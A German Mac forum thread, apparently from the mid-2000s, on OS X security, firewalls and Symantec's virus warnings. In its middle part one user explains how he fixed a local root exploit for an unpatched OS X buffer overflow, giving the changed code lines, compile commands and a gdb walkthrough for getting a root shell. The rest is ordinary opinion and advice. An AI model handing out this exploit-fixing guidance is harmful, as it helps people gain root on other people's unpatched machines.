Mit der Popularität kommen die Angreifer

[newman]

Ein paar Grundregeln gibt es, unabhängig vom OS:

- Firewall aktivieren
- absolute Vorsicht gegenüber E-Mail Attachments
- keine Programme aus fragwürdigen Quellen laden/einsetzen
- regelmässige Updates

Obiges ist kaum Aufwand und damit lässt es sich sogar in der Windows-Welt ziemlich gut leben. Ein Progrämmchen welches den Verkehr nach draussen überwacht, Little Snitch sei wärmstens ans Herz gelegt, finde ich persönlich auch ganz angenehm. Möglicherweise bin ich auch nur leicht paranoid.

 

[hustinettenbär]

Zumindest sollte man sich mit der Firewall auseinandersetzen, wenn der eigene Rechner direkt auf der Internet-Leitung hängt. Und da bedarf es nicht mal mehr der Konsole, weil grafische Front-Ends gibt es mittlerweile für ipfw.

naja, der einzige sinn, den eine firewall macht, die auf dem host läuft, den sie schützen soll, wird bei osx ad absurdum geführt. denn würmer gibt es so ja noch nicht für osx. zum schutz vor hackern macht sowas IMHO wenig sinn. dazu nimmt man besser einen host davor.

 

[Jazz_Rabbit]

Ein Progrämmchen welches den Verkehr nach draussen überwacht, Little Snitch sei wärmstens ans Herz gelegt, finde ich persönlich auch ganz angenehm. Möglicherweise bin ich auch nur leicht paranoid.

Nö, würde nicht sagen, das Du paranoid bist, einfach nur realistisch.
Ist das so eine Art Watchdog-Programm?

Gruss,

 

[newman]

naja, der einzige sinn, den eine firewall macht, die auf dem host läuft, den sie schützen soll, wird bei osx ad absurdum geführt. denn würmer gibt es so ja noch nicht für osx. zum schutz vor hackern macht sowas IMHO wenig sinn. dazu nimmt man besser einen host davor.

Die Argumentation finde ich bemerkenswert. Noch gibt es keine Würmer für OS X, das ist richtig. Aber warum soll ich aus diesem Grund keine Firewall benutzen? Ist Vorsorge nicht besser als das Nachsehen zu haben? Bei mir läuft die Firewall natürlich auf dem Router, aber IMHO ist die OS X Firewall besser als im Fall des Falles mit runtergelassenen Hosen dazustehen.

 

[newman]

Nö, würde nicht sagen, das Du paranoid bist, einfach nur realistisch.
Ist das so eine Art Watchdog-Programm?

Gruss,

Jepp, funktioniert so wie ich es verstehe, unabhängig von der internen Firewall. Eigentlich sehr ähnlich der Funktionalität wie sie in den Personal Firewalls wie Kerio oder Outpost auf dem PC eingebaut ist. Versucht ein Prozess nach draussen zu kommunizieren wird nachgefragt. Man kann es dann einmal erlauben, oder Regeln erstellen.

Sehr nettes kleines Programm und auch erschwinglich.

 

[hustinettenbär]

Die Argumentation finde ich bemerkenswert. Noch gibt es keine Würmer für OS X, das ist richtig. Aber warum soll ich aus diesem Grund keine Firewall benutzen? Ist Vorsorge nicht besser als das Nachsehen zu haben? Bei mir läuft die Firewall natürlich auf dem Router, aber IMHO ist die OS X Firewall besser als im Fall des Falles mit runtergelassenen Hosen dazustehen.

wenn du es so rum siehst hast du vielleicht recht, nur, ausser vor wurmangriffen zu schützen, leistet ein firewall, der auf dem zu schützenden system läuft, nichts. wenn du die wall als vorsorge zu kommenden wurmangriffen siehst, ok. aber um cracker abzuwehren, naja. was ist das ziel eines firewalls? den netzwerkverkehr zu reglementieren und nur bestimmte dienste ins (böse) internet zu entlassen. kann ich einem firewall vertrauen, der auf dem host läuft, dessen dienste ich schützen will? nein, denn sämtlicher netzwerk (internet) verkehr gelangt zu eben diesem host und wird erst dort verworfen oder durchgelassen. das ist IMHO ein designfehler bei solchen lösungen und spiegelt falsche sicherheit vor. genau wie im w32 bereich mit zonealarm oder ähnlichen lösungen. unter windows installiert man sich sogar noch sicherheitslücken dazu, anstatt das übel an der wurzel zu packen und unnötige dienste zu deaktivieren (poste gerne noch links, falls es interessiert)
tut mir übrigens grad wirklich leid, die osx firewall (netfilter basierend denk ich) mit zonealarm zu vergleichen, netfilter ist wirklich ein ganz anderes kaliber!

um mal einen abgedroschenen aber wahren spruch zu bemühen: firewall ist ein konzept, kein programm, was man sich installieren kann.

 

[crashx]

hi crashx
du scheinst dich ja auszukennen - ich hätt da mal ein paar fragen:

in den links (vor allem dem von apple) steht ja recht häufig *can*, *may*, ... das hat mich etwas irritiert.
und da ich hier eine kiste ohne das besagte security update stehen habe, versuchte ich, mir eine rootshell zu machen die ohne passwort promtet. ich hab also das script ausführbar gemacht und es zeigt auch an, von wem es ist etc.

wenn ich allerdings bei der passworteingabe auf enter drücke, heisst es falsches passwort.

kann es sein, dass der hash in dem script zu kurz für den buffer overflow ist? gibt es andere voraussetzungen, die nicht in dem advisory stehen? mach ich was falsch?
oder ist es mal wieder nur heisse luft und es kann garnicht oder nur unter sehr apokryphen umständen tun?

naja ob das exploit richtig funktioniert kann ich dir nicht sagen, jedoch das man diesen bug ausnutzen kann zu 100%. Ich hab jetzt einen genaueren Blick da reingeworfen und schonmal einen fehler entdeckt der das ausführen vom shellcode verhindern würde.
Ich habe den mal verbessert und du kannst es hier runterladen:

keine angst ich habe da nix böses reingepackt nur die zeile
" for(i=16;i<1100;i+=4)*(long *)&buf=(0xbffffffa-strlen(exec));"
in
" for(i=16;i<1100;i+=4)*(long *)&buf=(0xbffffffa-strlen(exec) - 2);"
geändert und die zeile
" printf("[*] Using the retaddr [%p]\n", (0xbffffffa-strlen(exec) - 2 ));"
eingefügt.
lad es runter und compilier es ganz enfach mit "gcc -o xosx-cf xosx-cf.c" und starte es mit "./xosx-cf".
Dann wenn es nach dem passwort fragt nicht enter drücken sondern in einer anderen konsole: "ps aux|grep su" Dann solltest du eine ähnliche ausgabe wie die bekommen:

powerbook:~ crashx$ ps aux|grep su
root 8118 0.0 0.1 27428 520 pa S<+ 11:11AM 0:00.00 su
crashx 8126 0.0 0.0 18644 100 std R+ 11:11AM 0:00.00 grep su

Nun kopier die PID vom su prozess und gib folgendes ein: "sudo gdb -p <SU-PID>". Natürlich die entsprechende pid einsetzen.
Dann kommt sowas in der art:

powerbook:~ crashx$ sudo gdb -p 8118
GNU gdb 5.3-20030128 (Apple version gdb-330.1) (Fri Jul 16 21:42:28 GMT 2004)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "powerpc-apple-darwin".
/Users/crashx/8118: No such file or directory.
Attaching to process 8118.
Reading symbols for shared libraries . done
Reading symbols for shared libraries ................... done
0x9000eac4 in read ()
(gdb)

und gib ein x/x 0xbfffffa0. die ausgabe vom debugger(gdb) sollte exakt wie diese sein:

(gdb) x/x 0xbfffffa0
0xbfffffa0: 0x7c631a79

wenn nich schreibe bitte was daran anders ist. wenn da alles ok war gib einfach "c" ein und mit enter bestätigen.
Jetz gib auch in der anderen konsole beim password prompt enter ein und guck nun im debugger was er sagt.
Fals er etwas anderes als "Program exited with code 01." sagt ist es schonmal ein gutes zeichen.
Falls da nun etwas ähnliches wie "Program received signal SIGTRAP, Trace/breakpoint trap." steht ist es ein sehr gutes zeichen und du kannst den debugger mit "q" beenden und das programm nochmal starten und dann beim password prompt direkt enter eingeben. du solltest nun eigentlich eine root shell haben. wenn da jedoch etwas wie "Program received signal SIGSEGV, Segmentation fault." kommt ist da nochn fehler im exploit wenn da das letztere oder etwas komplett anderes kommt poste es bitte damit ich es mir angucken kann.

 

[xlqr]

naja ob das exploit richtig funktioniert kann ich dir nicht sagen, jedoch das man diesen bug ausnutzen kann zu 100%. Ich hab jetzt einen genaueren Blick da reingeworfen und schonmal einen fehler entdeckt der das ausführen vom shellcode verhindern würde.
Ich habe den mal verbessert und du kannst es hier runterladen:

keine angst ich habe da nix böses reingepackt nur die zeile
" for(i=16;i<1100;i+=4)*(long *)&buf=(0xbffffffa-strlen(exec));"
in
" for(i=16;i<1100;i+=4)*(long *)&buf=(0xbffffffa-strlen(exec) - 2);"
geändert und die zeile
" printf("[*] Using the retaddr [%p]\n", (0xbffffffa-strlen(exec) - 2 ));"
eingefügt.
lad es runter und compilier es ganz enfach mit "gcc -o xosx-cf xosx-cf.c" und starte es mit "./xosx-cf".
Dann wenn es nach dem passwort fragt nicht enter drücken sondern in einer anderen konsole: "ps aux|grep su" Dann solltest du eine ähnliche ausgabe wie die bekommen:

Nun kopier die PID vom su prozess und gib folgendes ein: "sudo gdb -p <SU-PID>". Natürlich die entsprechende pid einsetzen.
Dann kommt sowas in der art:

und gib ein x/x 0xbfffffa0. die ausgabe vom debugger(gdb) sollte exakt wie diese sein:

wenn nich schreibe bitte was daran anders ist. wenn da alles ok war gib einfach "c" ein und mit enter bestätigen.
Jetz gib auch in der anderen konsole beim password prompt enter ein und guck nun im debugger was er sagt.
Fals er etwas anderes als "Program exited with code 01." sagt ist es schonmal ein gutes zeichen.
Falls da nun etwas ähnliches wie "Program received signal SIGTRAP, Trace/breakpoint trap." steht ist es ein sehr gutes zeichen und du kannst den debugger mit "q" beenden und das programm nochmal starten und dann beim password prompt direkt enter eingeben. du solltest nun eigentlich eine root shell haben. wenn da jedoch etwas wie "Program received signal SIGSEGV, Segmentation fault." kommt ist da nochn fehler im exploit wenn da das letztere oder etwas komplett anderes kommt poste es bitte damit ich es mir angucken kann.

wenn ich zeit hab, werd ichs mal versuchen - aber irgendwie hört es sich nicht nach einem brandgefährlichen ding an kopfkratz

 

[crashx]

doch doch, das teil is brandgefährlich nur der author hat wohl einen oder mehrere fehler eingebaut damit net jedes kiddy das teil benutzen kann um sich bei seinen mac freunden root zu holen
Ich hab seinen kleinen kiddy schutz mit meinem post jetzt wohl zu nichte gemacht
Wenn man das teil einmal gefixt hat, kann man damit jede verwundbare os x kiste rooten.

 

[Jazz_Rabbit]

und was kann man dann in dem Fall machen? Root löschen und hoffen, das man den niemals mehr braucht? Oder geht das über die uid=0 und es ist egal, wie der admin heisst?

 

[xlqr]

und was kann man dann in dem Fall machen? Root löschen und hoffen, das man den niemals mehr braucht? Oder geht das über die uid=0 und es ist egal, wie der admin heisst?

bleib cool

es geht - wenn überhaupt! - nur auf rechnern ohne das angesprochene security update. und selbst ohne (sec update) taugt es wenig bis garnicht für einen angriff aus dem netz ...

 

[Tensai]

Solange Symantec keine besseren Mac-Produkte herstellt, möchte ich auch keinen Virenscanner von denen! Die sollen mal blos nich den Mund zu voll nehmen, bisher verursachen Symantec-Produkte mehr Ärger auf dem Mac als sie Probleme lösen.

Prinzipiell sollte man sich mit einem Mac schon auch Gedanken über Sicherheit machen, aber da der Hinweis von Symantec kam, tippe ich eher auf Marketing-Gründe seitens Symantec.

 

[avalon]

Solange Symantec keine besseren Mac-Produkte herstellt, möchte ich auch keinen Virenscanner von denen! Die sollen mal blos nich den Mund zu voll nehmen, bisher verursachen Symantec-Produkte mehr Ärger auf dem Mac als sie Probleme lösen.

clap clap
Das walte Hugo..

 

[_julius]

mangelndes sicherheitsbewusstsein d. mac user wird zurecht moniert: http://www.netzwelt.de/news/70541_1-mac-os-x-mit-der.html

sicherlich auch ein bischen marketingstrategie (symantec), aber die gefahr wird leider oft unterschätzt. mac-marktanteil steigt, potentielle gefahr wächst mit.

ich hab irgendwie das gefühl sie stellen das so hin als wenn apple mit seinem erfolg SCHULD an den viren wäre, so ein quatsch

that's the price of success !

 

[Graundsiro]

So ganz von der Hand zu weisen ist das alles nicht, ob nun Symantec an eine Werbetrommel rührt, oder auch nicht.
Wer hier glaubt OSX wäre soooo Sicher, sollte einmal

Der mit dem OSX-Wurm tanzt
lesen!
Gruss

Huch!! kopfkratz Das klingt doch echt bedrohlich.